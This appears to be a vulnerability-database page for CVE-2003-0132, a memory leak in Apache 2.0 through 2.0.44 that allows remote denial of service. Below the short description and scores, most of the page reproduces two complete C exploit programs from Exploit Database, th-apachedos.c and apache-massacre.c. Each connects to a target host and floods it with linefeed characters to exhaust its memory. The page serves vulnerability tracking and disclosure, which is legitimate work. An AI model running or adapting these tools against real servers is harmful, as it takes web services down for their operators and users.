CVE-2003-0132

EPSS

91.8%V3

Vector

Network

Published

2003-04-03 03:00 +00:00

Last Modified

2021-06-06 08:09 +00:00

Official links

CVE.org

NVD

Alert for a CVE

Stay informed of any changes for a specific CVE.

Alert management

List of Alerts

Alert for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2024-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

Descriptions

A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.

Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-772	Missing Release of Resource after Effective Lifetime The product does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.

Metrics

Metric	Score	Severity	CVSS Vector	Source
V2	5		AV:N/AC:L/Au:N/C:N/I:N/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 11

Publication date : 2003-04-10 22:00 +00:00
Author : Daniel Nystram
EDB Verified : Yes

/******** th-apachedos.c ******************************************************** * * * Remote Apache DoS exploit * * ------------------------- * * Written as a poc for the: * * * This program sends 8000000 \n's to exploit the Apache memory leak. * * Works from scratch under Linux, as opposed to apache-massacre.c . * * * * Daniel Nyström * * * - www.telhack.tk - * * ******************************************************** th-apachedos.c ********/ #include #include #include #include #include #include #include #include int main(int argc, char *argv[]) { int sockfd; int count; char buffer[8000000]; struct sockaddr_in target; struct hostent *he; if (argc != 3) { fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit."); fprintf(stderr, "\n----------------------------------------------"); fprintf(stderr, "\nUsage: %s \n\n", argv[0]); exit(-1); } printf("\nTH-Apache DoS\n"); printf("-------------\n"); printf("-> Starting...\n"); printf("->\n"); // memset(buffer, '\n', sizeof(buffer)); /* testing */ for (count = 0; count < 8000000;) { buffer[count] = '\r'; /* 0x0D */ count++; buffer[count] = '\n'; /* 0x0A */ count++; } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname() failed "); exit(-1); } memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_port = htons(atoi(argv[2])); target.sin_addr = *((struct in_addr *)he->h_addr); printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); printf("->\n"); if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket() failed "); exit(-1); } if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0) { perror("connect() failed "); exit(-1); } printf("-> Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); printf("->\n"); if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer)) { perror("send() failed "); exit(-1); close(sockfd); } close(sockfd); printf("-> Finished smoothly, check hosts apache...\n\n"); } // milw0rm.com [2003-04-11]

Exploit Database EDB-ID : 9

Publication date : 2003-04-08 22:00 +00:00
Author : Matthew Murphy
EDB Verified : Yes

/* apache-massacre.c * Test code for Apache 2.x Memory Leak * By Matthew Murphy * * DISCLAIMER: This exploit tool is provided only to test networks for a * known vulnerability. Do not use this tool on systems you do not control, * and do not use this tool on networks you do not own without appropriate * consent from the network owner. You are responsible for any damage your * use of the tool causes. In no event may the author of this tool be held * responsible for damages relating to its use. * * As with most Apache exposures, the impacts vary between ports of the server: * * Non-Unix (Win32, Netware, OS/2): These ports are most adversely affected * by this, as Apache's child process doesn't terminate normally unless the * parent process stops. This means that leaks (and any performance loss) hang * around until Apache is restarted. * * Unix/mpm_prefork: This MPM offers the most protection against successful * exploitation, as its processes exit at the end of the request. * * Unix/other MPMs: These other MPMs utilize multiple Apache processes for * multiple Apache requests. Depending on the MPM in use and the traffic rates * of the server, this may be used to the advantage of a potential attacker. * If multiple different Apache processes are utilized, an attacker can spread * the substantial leak between processes to dodge resource limits imposed on * httpd's UID (usually nobody, www, or apache) * * Credit: iDEFENSE reported this issue to several security lists on April 8, * 2003 following the Apache release announcement. Apache fixed the flaw about * a month after the initial disclosure of this vulnerability. iDEFENSE credits * the discovery of this vulnerability to an anonymous researcher. * * Happy Hunting! */ #ifndef _WIN32 #include #include #include #include #include #include #include #include #else #include #pragma comment(lib, "wsock32.lib") #endif #include #include int sig_fired = 0; #ifndef _WIN32 void sig_handler(int sig) { #else BOOL WINAPI sig_handler(DWORD dwCtrlType) { #endif sig_fired = 1; #ifndef _WIN32 return; #else return TRUE; #endif } int main(int argc, char *argv[]) { SOCKET s; struct sockaddr_in sin; char buffer[1025]; struct hostent *he; unsigned short iPort = 80; int newlines = 100; char *p; char *p2; int i; #ifdef _WIN32 WSADATA wsa_prov; #endif printf("Apache Massacre v1.0\r\n"); printf("Exploit by Matthew Murphy\r\n"); printf("Vulnerability reported by iDEFENSE Labs\r\n\r\n"); #ifdef _WIN32 if (WSAStartup(0x0101, &wsa_prov)) { perror("WSAStartup"); exit(1); } #endif printf("Please enter the web server's host/IP: "); fgets(&buffer[0], 1024, stdin); he = gethostbyname(&buffer[0]); if (!he) { perror("gethostbyname"); exit(1); } sin.sin_addr.s_addr = *((unsigned long *)he->h_addr); printf("Please enter the web server's port: "); fgets(&buffer[0], 1024, stdin); iPort = (unsigned short)atoi(&buffer[0]); #ifndef _WIN32 #ifdef _SOLARIS sigset(SIGINT, &sig_handler); #else signal(SIGINT, &sig_handler); #endif #else SetConsoleCtrlHandler(&sig_handler, TRUE); #endif printf("How many newlines should be in each request [100]: "); fgets(&buffer[0], 1024, stdin); if (!buffer[0] == 0x0D && !buffer[0] == 0x0A) { newlines = atoi(&buffer[0]); } p = malloc(newlines*2); p2 = p; for (i = 0; i < newlines; i++) { *p2 = 0x0D; p2++; *p2 = 0x0A; p2++; } newlines += newlines; s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { perror("socket"); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(iPort); if (connect(s, (const struct sockaddr *)&sin, sizeof(struct sockaddr_in))) { perror("connect"); exit(1); } while (1) { if (!send(s, (char *)p, newlines, 0) == newlines) { perror("send"); exit(1); } if (sig_fired) { printf("Terminating on SIGINT"); free(p); #ifndef _WIN32 close(s); #else closesocket(s); WSACleanup(); #endif exit(0); } } } // milw0rm.com [2003-04-09]